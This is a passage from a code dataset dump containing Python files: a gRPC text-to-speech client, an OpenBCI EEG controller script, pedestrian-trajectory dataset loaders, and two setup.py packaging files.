"line_number": 265, "usage_type": "call"}, {"api_name": "reviewboard.avatars.avatar_services", "line_number": 265, "usage_type": "name"}, {"api_name": "djblets.avatars.services.URLAvatarService.avatar_service_id", "line_number": 266, "usage_type": "attribute"}, {"api_name": "djblets.avatars.services.URLAvatarService", "line_number": 266, "usage_type": "name"}]} +{"seq_id": "530727662", "text": "#!/usr/bin/env python3\r\n# coding: utf-8\r\n\r\nimport os\r\nimport grpc\r\nimport logging\r\nimport numpy as np\r\n\r\nimport jarvis_api.audio_pb2 as ja\r\nimport jarvis_api.jarvis_tts_pb2 as jtts\r\nimport jarvis_api.jarvis_tts_pb2_grpc as jtts_srv\r\n\r\nfrom jetson_voice import TTSService\r\n\r\n \r\nclass JarvisTTSService(TTSService):\r\n \"\"\"\r\n Jarvis streaming TTS service. \r\n \"\"\"\r\n def __init__(self, config, *args, **kwargs):\r\n \"\"\"\r\n Open a streaming channel to the Jarvis server for TTS. This establishes a connection over GRPC \r\n and sends/recieves the requests and responses.\r\n \"\"\"\r\n super(JarvisTTSService, self).__init__(config, *args, **kwargs)\r\n \r\n self.config.setdefault('server', 'localhost:50051')\r\n self.config.setdefault('sample_rate', 22050) # ignored (will always be 22.05KHz)\r\n self.config.setdefault('voice_name', 'ljspeech') # ignored\r\n self.config.setdefault('language_code', 'en-US')\r\n\r\n logging.info(f'Jarvis TTS service config:\\n{self.config}')\r\n \r\n self.channel = grpc.insecure_channel(self.config.server)\r\n self.client = jtts_srv.JarvisTTSStub(self.channel)\r\n\r\n def __call__(self, text):\r\n \"\"\"\r\n Generate audio from text.\r\n \r\n Parameters:\r\n text (string) -- The phrase to convert to audio.\r\n\r\n Returns audio samples in a numpy array.\r\n \"\"\"\r\n req = jtts.SynthesizeSpeechRequest()\r\n \r\n req.text = text\r\n req.language_code = self.config.language_code\r\n req.sample_rate_hz = self.config.sample_rate\r\n req.voice_name = self.config.voice_name\r\n req.encoding = ja.AudioEncoding.LINEAR_PCM\r\n\r\n resp = self.client.Synthesize(req)\r\n \r\n samples = np.frombuffer(resp.audio, dtype=np.float32)\r\n return samples\r\n \r\n @property\r\n def sample_rate(self):\r\n \"\"\"\r\n Get the output sample rate (in Hz)\r\n \"\"\"\r\n return self.config.sample_rate", "sub_path": "jetson_voice/backends/jarvis/jarvis_tts.py", "file_name": "jarvis_tts.py", "file_ext": "py", "file_size_in_byte": 2013, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "jetson_voice.TTSService", "line_number": 16, "usage_type": "name"}, {"api_name": "logging.info", "line_number": 32, "usage_type": "call"}, {"api_name": "grpc.insecure_channel", "line_number": 34, "usage_type": "call"}, {"api_name": "jarvis_api.jarvis_tts_pb2_grpc.JarvisTTSStub", "line_number": 35, "usage_type": "call"}, {"api_name": "jarvis_api.jarvis_tts_pb2_grpc", "line_number": 35, "usage_type": "name"}, {"api_name": "jarvis_api.jarvis_tts_pb2.SynthesizeSpeechRequest", "line_number": 46, "usage_type": "call"}, {"api_name": "jarvis_api.jarvis_tts_pb2", "line_number": 46, "usage_type": "name"}, {"api_name": "jarvis_api.audio_pb2.AudioEncoding", "line_number": 52, "usage_type": "attribute"}, {"api_name": "jarvis_api.audio_pb2", "line_number": 52, "usage_type": "name"}, {"api_name": "numpy.frombuffer", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 56, "usage_type": "attribute"}]} +{"seq_id": "595374334", "text": "#!/usr/bin/env python2\n\nimport time\nimport 
threading\nimport csv\nimport numpy as np\nfrom multiprocessing import Process\nimport sys\nimport serial\nfrom sklearn.externals import joblib\nfrom scipy import signal\n\nsys.path.append('..')\nfrom open_bci import *\nfrom pylab import *\n\n#'/dev/tty.usbmodemfd121'\n#Notes for using csv_collector.py\n#initiate CSVCollector, takes filename, port, and baud as inputs\n#start recording with start() method\n#tag recording with tag() method\n#what needs to be implemented\n# A if statement for multiprocessing/threading.\n\nOPENBCI_PORT = '/dev/ttyACM0'\nTEENSY_PORT = '/dev/ttyACM1'\nTEENSY_ENABLED = False\n\nbox_width = 250\nlook_back = 60\nM = 25\nr = 250\nf1, f2 = 7, 14\n\nwavelet1 = signal.morlet(M, w=(f1*M)/(2.0*r))\nwavelet2 = signal.morlet(M, w=(f2*M)/(2.0*r))\n\ndef extract_features(data):\n sigs = np.zeros((data.shape[0], 3))\n sigs[..., 0] = (data[..., 0] + data[..., 1])/2.0\n sigs[..., 1] = (data[..., 2] + data[..., 3])/2.0\n sigs[..., 2] = (data[..., 4] + data[..., 5])/2.0\n\n # fft_len = np.fft.rfft(data[..., 0]).shape[0]\n features = np.array([])\n\n\n for j in range(3):\n sig = sigs[..., j]\n conv1 = signal.convolve(sig, wavelet1, 'same')\n conv2 = signal.convolve(sig, wavelet2, 'same')\n fourier = np.fft.fft(sig)\n fourier1 = np.fft.fft(conv1) \n fourier2 = np.fft.fft(conv2)\n features = np.hstack([features, np.abs(fourier), np.abs(fourier1), np.abs(fourier2)])\n # not sure if this is a good idea -->\n features = np.hstack([features, np.angle(fourier), np.angle(fourier1), np.angle(fourier2)])\n\n \n return features\n\n\nclass MIPlotter(object):\n\n def __init__(self, port=None, baud=115200):\n print(\"connecting to OpenBCI...\")\n self.board = OpenBCIBoard(port, baud)\n \n self.bg_thread = None\n self.bg_draw_thread = None\n self.data = np.array([0]*8)\n self.should_plot = False\n self.control = np.array([0,0,0])\n self.control_f = np.array([0])\n self.out_sig = np.array([0])\n self.controls = np.array([[0]*4])\n self.eye_r = np.array([0])\n self.eye_l = np.array([0])\n\n model, good_features = joblib.load('neighbors_model.pkl')\n # self.eye_l_temp, self.eye_r_temp = joblib.load('eye_blinks.pkl')\n self.good_features = good_features\n self.model = model\n \n print(\"connecting to teensy...\")\n if TEENSY_ENABLED:\n self.teensy = serial.Serial(TEENSY_PORT, 57600)\n \n \n def stop(self):\n # resolve files and stuff\n self.board.should_stream = False\n self.should_plot = False\n #self.bg_thread.join()\n self.bg_thread = None\n self.data = np.array([0]*8)\n \n def disconnect(self):\n self.board.disconnect()\n\n def plot(self):\n\n plt.clf()\n\n hold(True)\n data = np.copy(self.data)\n\n \n control_arr = np.zeros(look_back)\n\n for i in range(look_back):\n d = data[i:(box_width+i)]\n features = extract_features(d)\n features = features[self.good_features]\n control_arr[i] = self.model.predict(features)\n\n control = control_arr.mean()\n control_f = 0.1 * control + 0.8 * self.control[-1] \n\n \n # control_f2 = 1 * control_f - 1 * self.control[-1]\n # control_f3 = 0.6 * control_f2 + 0.4 * self.control_f[-1]\n \n self.control = np.append(self.control, control_f)\n # self.control_f = np.append(self.control_f, control_f3)\n # self.controls = np.vstack([self.controls, controls_f])\n\n\n # out_sig = control\n \n if control_f < -0.07:\n out_sig = 550\n elif control_f > 0.07:\n out_sig = 450\n else:\n out_sig = 500\n\n\n # r_max = np.max(signal.correlate(self.eye_r_temp, data[..., 6]))\n # l_max = np.max(signal.correlate(self.eye_l_temp, data[..., 7]))\n\n # self.eye_r = np.append(self.eye_r, 
r_max)\n # self.eye_l = np.append(self.eye_l, l_max)\n \n \n self.out_sig = np.append(self.out_sig, out_sig)\n\n if TEENSY_ENABLED:\n self.teensy.write(\"0\" + str(out_sig) + \"\\r\")\n \n # for i in range(4):\n # plot(self.controls[-40:, i], label=str(i+1))\n\n # plot(sig)\n # plot(conv1)\n # plot(conv2)\n \n plot(self.control[-40:])\n # plot(self.out_sig[-40:] * 0.001)\n\n # plot(self.eye_l[-40:])\n # plot(self.eye_r[-40:])\n # plot((self.eye_r[-40:] > 0.00011) * 0.001)\n \n # plot(self.control_f[-40:])\n # plot(self.out_sig[-40:] * 0.001)\n # ylim([-0.005, 0.005])\n\n # ylim([0, 0.02])\n\n # legend(bbox_to_anchor=(0., 1.02, 1., .102), loc=3,\n # ncol=4, mode=\"expand\", borderaxespad=0.)\n\n #plot(freq, np.log(abs(fourier)), label=str(i+1))\n \n #title('channel {0}'.format(i+1))\n # ylim([-0.0005, 0.0005])\n # ylim([-12, 0])\n # xlim([0, 60])\n # legend(bbox_to_anchor=(0., 1.02, 1., .102), loc=3,\n # ncol=4, mode=\"expand\", borderaxespad=0.)\n\n # plot(freq, np.log(abs(fourier)))\n \n show(block=False)\n draw()\n \n def background_plot(self):\n while self.should_plot:\n if len(self.data) >= box_width + look_back:\n self.plot()\n time.sleep(0.05)\n \n def receive_sample(self, sample):\n t = time.time()\n idd = sample.id\n sample = sample.channels\n if not np.any(np.isnan(sample)):\n self.data = np.vstack( (self.data[-250-look_back:, ...], sample) )\n\n \n def start(self):\n \n if self.bg_thread:\n self.stop()\n\n \n #create a new thread in which the OpenBCIBoard object will stream data\n self.bg_thread = threading.Thread(target=self.board.start, \n args=(self.receive_sample, ))\n # self.bg_thread = Process(target=self.board.start,\n # args=(self.receive_sample, ))\n\n self.bg_thread.start()\n\n # self.bg_draw_thread = threading.Thread(target=self.background_plot,\n # args=())\n\n # self.bg_draw_thread.start()\n \n ion()\n figure()\n show(block=False)\n\n self.should_plot = True\n \n self.background_plot()\n\nif __name__ == '__main__':\n plotter = MIPlotter(port=OPENBCI_PORT)\n plotter.start()\n\n plt.rc('axes', color_cycle=['red', 'orange', 'yellow', 'green'])\n\n\n\n\n\n\n", "sub_path": "utilities/mi_controller_ml.py", "file_name": "mi_controller_ml.py", "file_ext": "py", "file_size_in_byte": 6691, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "sys.path.append", "line_number": 13, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 13, "usage_type": "attribute"}, {"api_name": "scipy.signal.morlet", "line_number": 35, "usage_type": "call"}, {"api_name": "scipy.signal", "line_number": 35, "usage_type": "name"}, {"api_name": "scipy.signal.morlet", "line_number": 36, "usage_type": "call"}, {"api_name": "scipy.signal", "line_number": 36, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 45, "usage_type": "call"}, {"api_name": "scipy.signal.convolve", "line_number": 50, "usage_type": "call"}, {"api_name": "scipy.signal", "line_number": 50, "usage_type": "name"}, {"api_name": "scipy.signal.convolve", "line_number": 51, "usage_type": "call"}, {"api_name": "scipy.signal", "line_number": 51, "usage_type": "name"}, {"api_name": "numpy.fft.fft", "line_number": 52, "usage_type": "call"}, {"api_name": "numpy.fft", "line_number": 52, "usage_type": "attribute"}, {"api_name": "numpy.fft.fft", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.fft", "line_number": 53, "usage_type": "attribute"}, {"api_name": 
"numpy.fft.fft", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.fft", "line_number": 54, "usage_type": "attribute"}, {"api_name": "numpy.hstack", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.angle", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 71, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 73, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 74, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 75, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 76, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 77, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 78, "usage_type": "call"}, {"api_name": "sklearn.externals.joblib.load", "line_number": 80, "usage_type": "call"}, {"api_name": "sklearn.externals.joblib", "line_number": 80, "usage_type": "name"}, {"api_name": "serial.Serial", "line_number": 87, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 96, "usage_type": "call"}, {"api_name": "numpy.copy", "line_number": 106, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 109, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 124, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 146, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 192, "usage_type": "call"}, {"api_name": "time.time", "line_number": 195, "usage_type": "call"}, {"api_name": "numpy.any", "line_number": 198, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 198, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 199, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 209, "usage_type": "call"}]} +{"seq_id": "139506580", "text": "\"\"\"A setuptools based setup module.\n\nSee:\nhttps://packaging.python.org/en/latest/distributing.html\nhttps://github.com/pypa/sampleproject\n\"\"\"\n\n# To use a consistent encoding\nfrom codecs import open\nfrom os import path\n\n# Always prefer setuptools over distutils\nfrom setuptools import find_packages, setup\n\nfrom telethon import TelegramClient\n\nhere = path.abspath(path.dirname(__file__))\n\n# Get the long description from the README file\nwith open(path.join(here, 'README.rst'), encoding='utf-8') as f:\n long_description = f.read()\n\nsetup(\n name='Telethon',\n\n # Versions should comply with PEP440.\n version=TelegramClient.__version__,\n description=\"Python3 Telegram's client implementation with full access to its API\",\n long_description=long_description,\n\n # The project's main homepage.\n url='https://github.com/LonamiWebs/Telethon',\n download_url='https://github.com/LonamiWebs/Telethon/releases',\n\n # Author details\n author='Lonami Exo',\n author_email='totufals@hotmail.com',\n\n # Choose your license\n license='MIT',\n\n # See https://pypi.python.org/pypi?%3Aaction=list_classifiers\n classifiers=[\n # How mature is this project? Common values are\n # 3 - Alpha\n # 4 - Beta\n # 5 - Production/Stable\n 'Development Status :: 3 - Alpha',\n\n # Indicate who your project is intended for\n 'Intended Audience :: Developers',\n 'Topic :: Communications :: Chat',\n\n # Pick your license as you wish (should match \"license\" above)\n 'License :: OSI Approved :: MIT License',\n\n # Specify the Python versions you support here. 
In particular, ensure\n # that you indicate whether you support Python 2, Python 3 or both.\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.3',\n 'Programming Language :: Python :: 3.4',\n 'Programming Language :: Python :: 3.5',\n ],\n\n # What does your project relate to?\n keywords='Telegram API chat client MTProto',\n\n # You can just specify the packages manually here if your project is\n # simple. Or you can use find_packages().\n packages=find_packages(exclude=[\n 'telethon_generator', 'telethon_tests', 'run_tests.py',\n 'try_telethon.py'\n ]),\n\n # List run-time dependencies here. These will be installed by pip when\n # your project is installed.\n install_requires=['pyaes'],\n\n # To provide executable scripts, use entry points in preference to the\n # \"scripts\" keyword. Entry points provide cross-platform support and allow\n # pip to create the appropriate form of executable for the target platform.\n entry_points={\n 'console_scripts': [\n 'gen_tl = tl_generator:clean_and_generate',\n ],\n })\n", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 2780, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "os.path.abspath", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path", "line_number": 17, "usage_type": "name"}, {"api_name": "os.path.dirname", "line_number": 17, "usage_type": "call"}, {"api_name": "codecs.open", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path", "line_number": 20, "usage_type": "name"}, {"api_name": "setuptools.setup", "line_number": 23, "usage_type": "call"}, {"api_name": "telethon.TelegramClient.__version__", "line_number": 27, "usage_type": "attribute"}, {"api_name": "telethon.TelegramClient", "line_number": 27, "usage_type": "name"}, {"api_name": "setuptools.find_packages", "line_number": 70, "usage_type": "call"}]} +{"seq_id": "64325576", "text": "\nimport os\nimport pdb\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\n# import sys\n\ndef pickle_data(env_data):\n\tpass\n\ndef load_env(env_string):\n\tif env_string == 'eth':\n\t\tpeds_data1, obs_data1 = load_eth_env('../crowd_dataset/ETH/ewap_dataset/seq_eth/')\n\t\tpeds_data2, obs_data2 = load_eth_env('../crowd_dataset/ETH/ewap_dataset/seq_hotel/')\n\t\treturn ((peds_data1, peds_data2), (obs_data1, obs_data2))\n\telif env_string == 'ucy':\n\t\tped_data1 = load_ucy_env('../crowd_dataset/UCY/arxie/')\n\t\tped_data2 = load_ucy_env('../crowd_dataset/UCY/university/')\n\t\tped_data3 = load_ucy_env('../crowd_dataset/UCY/zara/')\n\t\treturn ped_data1, ped_data2, ped_data3\n\telif env_string == 'grand':\n\t\tped_data = load_grand_env('../crowd_dataset/grand-central/')\n\t\treturn ped_data\n\telif env_string == 'train':\n\t\tped_data = load_train_env('../crowd_dataset/train-station/')\n\t\treturn ped_data\n\telif env_string == 'all':\n\t\teth_data1, _ = load_eth_env('../crowd_dataset/ETH/ewap_dataset/seq_eth/')\n\t\teth_data2, _ = load_eth_env('../crowd_dataset/ETH/ewap_dataset/seq_hotel/')\n\t\tucy_data1 = load_ucy_env('../crowd_dataset/UCY/arxie/')\n\t\tucy_data2 = load_ucy_env('../crowd_dataset/UCY/university/')\n\t\tucy_data3 = load_ucy_env('../crowd_dataset/UCY/zara/')\n\t\tgra_data = load_grand_env('../crowd_dataset/grand-central/')\n\t\ttra_data = load_train_env('../crowd_dataset/train-station/')\n\n\n'''\nGRAND CENTRAL CROWD 
DATASET PROCESSING\n'''\ndef load_grand_env(directory):\n\tpass\n\n'''\nTRAIN CROWD DATASET PROCESSING\n'''\ndef load_train_env(directory):\n\tpass\n\n\n'''\nUCY CROWD DATASET PROCESSING\n'''\ndef load_ucy_env(directory):\n\tfiles = os.listdir(directory)\n\tfor file in files:\n\t\tfile = directory + file\n\t\twith open(file, 'r') as file:\n\t\t\tdata = file.read().split('\\n')\n\t\t\tpdb.set_trace()\n\n'''\nETH CROWD DATASET PROCESSING\nNote: This dataset is presented in meters (m).\nWhen training on this dataset individually this is fine; however, when\nusing all the datasets as a training set this dataset must be converted\nto pixel units as the remaining datasets are in the image plane.\n\nQ: Does the origin shifting matter? i.e. UCY origin is center of image plane\nwhile train origin is top left corner. \nA: Yes. This is solved with a simple translation based on the image size.\n'''\ndef load_eth_env(directory, pixels=False):\n\tped_file = directory + 'obsmat.txt'\n\tobs_file = directory + 'map.png'\n\tH_file = directory + 'H.txt'\n\tpeds_data = load_eth_pedestrian(ped_file, H_file, pixels=pixels)\n\tobs_data = load_eth_obstacles(obs_file, H_file, pixels)\n\treturn peds_data, obs_data\n\ndef load_eth_pedestrian(file, h_file, pixels=False):\n\tif pixels:\n\t\twith open(h_file, 'r') as file:\n\t\t\tH = file.read().split('\\n')\n\t\t\tfor i, h in enumerate(H):\n\t\t\t\th = np.array(h.split(' '))\n\t\t\t\th_indices = np.where(h != '')\n\t\t\t\tH[i] = [float(i) for i in h[h_indices]]\n\n\t\tH = np.array(H[:-1])\n\t\t\n\twith open(file, 'r') as file:\n\t\tpeds_data = file.read().split('\\n')\n\t\tpeds_frame = []\n\t\tdata = []\n\t\tframe = 1\n\t\tfor i, ped in enumerate(peds_data):\n\t\t\tped_data = np.array(ped.split(' '))\n\t\t\tindices = np.where(ped_data != '')\n\t\t\tn_ped_data = np.array([float(j) for j in ped_data[indices]])\n\t\t\tif len(n_ped_data) == 0: continue\n\t\t\tif n_ped_data[0] == frame:\n\t\t\t\tpeds_frame.append(n_ped_data)\n\t\t\telse:\n\t\t\t\tframe = n_ped_data[0]\n\t\t\t\tpeds_frame_np = np.array(peds_frame)\n\t\t\t\tdata.append(peds_frame_np)\n\t\t\t\tpeds_frame.clear()\n\t\t\t\tpeds_frame.append(n_ped_data)\n\n\t\t\t# peds_data[i] = np.array(n_ped_data)\n\n\t\t# peds_data = peds_data[:-1] # Remove last empty line\n\t\t# peds_data[i] = ped_data\n\t\t# pdb.set_trace()\n\treturn np.array(data)\n\ndef load_eth_obstacles(map, h_file, border=False):\n\timg = mpimg.imread(map)\n\tn,m = np.shape(img)\n\t\n\tif border:\n\t\t# Outer Edge of Image\n\t\tx_border = np.arange(n).reshape((1,-1))\n\t\ty_border = np.arange(m).reshape((1,-1))\n\t\tx0 = np.vstack((x_border, np.zeros((1,n))))\n\t\txm = np.vstack((x_border, m*np.ones((1,n))))\n\t\ty0 = np.vstack((np.zeros((1,m)), y_border))\n\t\tyn = np.vstack((n*np.ones((1,m)), y_border))\n\t\tborders = np.hstack((x0,xm,y0,yn))\n\t\t_, m = np.shape(borders)\n\t\n\tindices = np.where(img == 1.)\n\t_, n = np.shape(indices)\n\t\n\tif border:\n\t\tobstacles = np.hstack((indices, borders))\n\t\tobstacles = np.vstack((obstacles, np.ones((1,n+m))))\n\telse:\n\t\tobstacles = np.vstack((indices, np.ones((1,n))))\n\t\n\twith open(h_file, 'r') as file:\n\t\tH = file.read().split('\\n')\n\t\tfor i, h in enumerate(H):\n\t\t\th = np.array(h.split(' '))\n\t\t\th_indices = np.where(h != '')\n\t\t\tH[i] = [float(i) for i in h[h_indices]]\n\n\tH = np.array(H[:-1])\n\tobs = H @ obstacles\n\treturn obs\n\n# Re-organizes data in terms of inputs and outputs\n# Organize in tensor of 'm x N x T' where m is the dimension, N are the agents, T is the time\ndef 
generate_eth_training_data(ped_data, inspace, outspace): # pos : position | vel : velocity | pv : pos & vel\n\tinputs = []\n\toutputs = []\n\t# pdb.set_trace()\n\tif inspace == 'pos' and outspace == 'vel': # Input: Position, Output: Current velocity\n\t\tfor i, frame in enumerate(ped_data):\n\t\t\tfor ped in frame:\t\n\t\t\t\tinputs.append([ped[2], ped[4]])\n\t\t\t\toutputs.append([ped[5], ped[7]])\n\n\t\tinputs = np.array(inputs)\n\t\toutputs = np.array(outputs)\n\t\treturn inputs, outputs\n\n\telif inspace == 'pos' and outspace == 'pos': # Input: Position, Output: Next timesteps position\n\t\t# Must grab the position from the next frame if it exists.\n\t\tfor i, frame in enumerate(ped_data):\n\t\t\tfor ped in frame:\n\t\t\t\tif i < len(ped_data) - 1:\n\t\t\t\t\tfor ped_future in ped_data[i + 1]:\n\t\t\t\t\t\tif ped[1] == ped_future[1]:\n\t\t\t\t\t\t\tinputs.append([ped[2], ped[4]])\n\t\t\t\t\t\t\toutputs.append([ped_future[2], ped_future[4]])\n\n\t\tinputs = np.array(inputs)\n\t\toutputs = np.array(outputs)\n\t\treturn inputs, outputs\n\n\telif inspace == 'pv' and outspace == 'pos': # Input: Position & Velocity, Output: Next timesteps position\n\t\tfor i, frame in enumerate(ped_data):\n\t\t\tfor ped in frame:\n\t\t\t\tif i < len(ped_data) - 1:\n\t\t\t\t\tfor ped_future in ped_data[i + 1]:\n\t\t\t\t\t\tif ped[1] == ped_future[1]:\n\t\t\t\t\t\t\tinputs.append([ped[2], ped[4], ped[5], ped[7]])\n\t\t\t\t\t\t\toutputs.append([ped_future[2], ped_future[4]])\n\n\t\tinputs = np.array(inputs)\n\t\toutputs = np.array(outputs)\n\t\treturn inputs, outputs\n\n\telif inspace == 'pv' and outspace == 'vel': # Input: Position & Velocity, Output: Next timesteps velocity\n\t\tfor i, frame in enumerate(ped_data):\n\t\t\tfor ped in frame:\n\t\t\t\tif i < len(ped_data) - 1:\n\t\t\t\t\tfor ped_future in ped_data[i + 1]:\n\t\t\t\t\t\tif ped[1] == ped_future[1]:\n\t\t\t\t\t\t\tinputs.append([ped[2], ped[4], ped[5], ped[7]])\n\t\t\t\t\t\t\toutputs.append([ped_future[5], ped_future[7]])\n\n\t\tinputs = np.array(inputs)\n\t\toutputs = np.array(outputs)\n\t\treturn inputs, outputs\n\n\telif inspace == 'pv' and outspace == 'pv': # Input: Position & Velocity, Output: Next position & velocity\n\t\tfor i, frame in enumerate(ped_data):\n\t\t\tfor ped in frame:\n\t\t\t\tif i < len(ped_data) - 1:\n\t\t\t\t\tfor ped_future in ped_data[i + 1]:\n\t\t\t\t\t\tif ped[1] == ped_future[1]:\n\t\t\t\t\t\t\tinputs.append([ped[2], ped[4], ped[5], ped[7]])\n\t\t\t\t\t\t\toutputs.append([ped_future[2], ped_future[4], ped_future[5], ped_future[7]])\n\n\t\tinputs = np.array(inputs)\n\t\toutputs = np.array(outputs)\n\t\treturn inputs, outputs", "sub_path": "utils/utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 7071, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "os.listdir", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 86, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 87, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 90, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 98, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 99, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 100, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 106, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 116, "usage_type": "call"}, {"api_name": "matplotlib.image.imread", "line_number": 119, 
"usage_type": "call"}, {"api_name": "matplotlib.image", "line_number": 119, "usage_type": "name"}, {"api_name": "numpy.shape", "line_number": 120, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 124, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 125, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 126, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 126, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 127, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 127, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 128, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 128, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 129, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 129, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 130, "usage_type": "call"}, {"api_name": "numpy.shape", "line_number": 131, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 133, "usage_type": "call"}, {"api_name": "numpy.shape", "line_number": 134, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 137, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 138, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 138, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 140, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 140, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 145, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 146, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 149, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 165, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 166, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 179, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 180, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 192, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 193, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 205, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 206, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 218, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 219, "usage_type": "call"}]} +{"seq_id": "338893731", "text": "#!/usr/bin/env python\n# coding=utf-8\n\n# Copyright [2020] [Apache Software Foundation]\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom __future__ import print_function\nimport os.path\nimport os\nimport sys\n\nfrom setuptools import setup, find_packages\nfrom setuptools.command.test import test as TestCommand\n\n# Package basic info\nPACKAGE_NAME = 'marvin_python_toolbox'\nPACKAGE_DESCRIPTION = 'Apache Marvin-AI Python Toolbox'\n\nURL = ''\n\nAUTHOR_NAME = 'Apache Marvin-AI Community'\nAUTHOR_EMAIL = 'dev@marvin.apache.org'\n\nPYTHON_2 = 
False\nPYTHON_3 = True\n\n# Project status\n# (should be 'planning', 'pre-alpha', 'alpha', 'beta', 'stable', 'mature' or 'inactive').\nSTATUS = 'planning'\n\n# Project topic\n# See https://pypi.python.org/pypi?%3Aaction=list_classifiers for a list\nTOPIC = 'Topic :: Software Development :: Libraries :: Python Modules'\n\n# External dependencies\n# More info https://pythonhosted.org/setuptools/setuptools.html#declaring-dependencies\nREQUIREMENTS_EXTERNAL = [\n 'docker',\n 'configparser',\n 'bump2version',\n 'wget',\n 'grpcio',\n 'grpcio-tools',\n 'click',\n 'cookiecutter',\n 'docker-compose',\n 'matplotlib',\n 'cryptography',\n 'kubernetes',\n 'requests'\n]\n\n# This is normally an empty list\nDEPENDENCY_LINKS_EXTERNAL = []\n# script to be used\nSCRIPTS = ['bin/marvin', \n 'bin/marvin_complete', \n 'bin/marvin-api']\n\n\ndef _get_version():\n \"\"\"Return the project version from VERSION file.\"\"\"\n with open(os.path.join(os.path.dirname(__file__), PACKAGE_NAME, 'VERSION'), 'rb') as f:\n version = f.read().decode('ascii').strip()\n return version\n\n\nDEVELOPMENT_STATUS = {\n 'planning': '1 - Planning',\n 'pre-alpha': '2 - Pre-Alpha',\n 'alpha': '3 - Alpha',\n 'beta': '4 - Beta',\n 'stable': '5 - Production/Stable',\n 'mature': '6 - Mature',\n 'inactive': '7 - Inactive',\n}\n\nCLASSIFIERS = ['Development Status :: {}'.format(DEVELOPMENT_STATUS[STATUS])]\nif PYTHON_2:\n CLASSIFIERS += [\n 'Programming Language :: Python :: 2',\n 'Programming Language :: Python :: 2.7',\n ]\nif PYTHON_3:\n CLASSIFIERS += [\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.6',\n ]\n\nsetup(\n 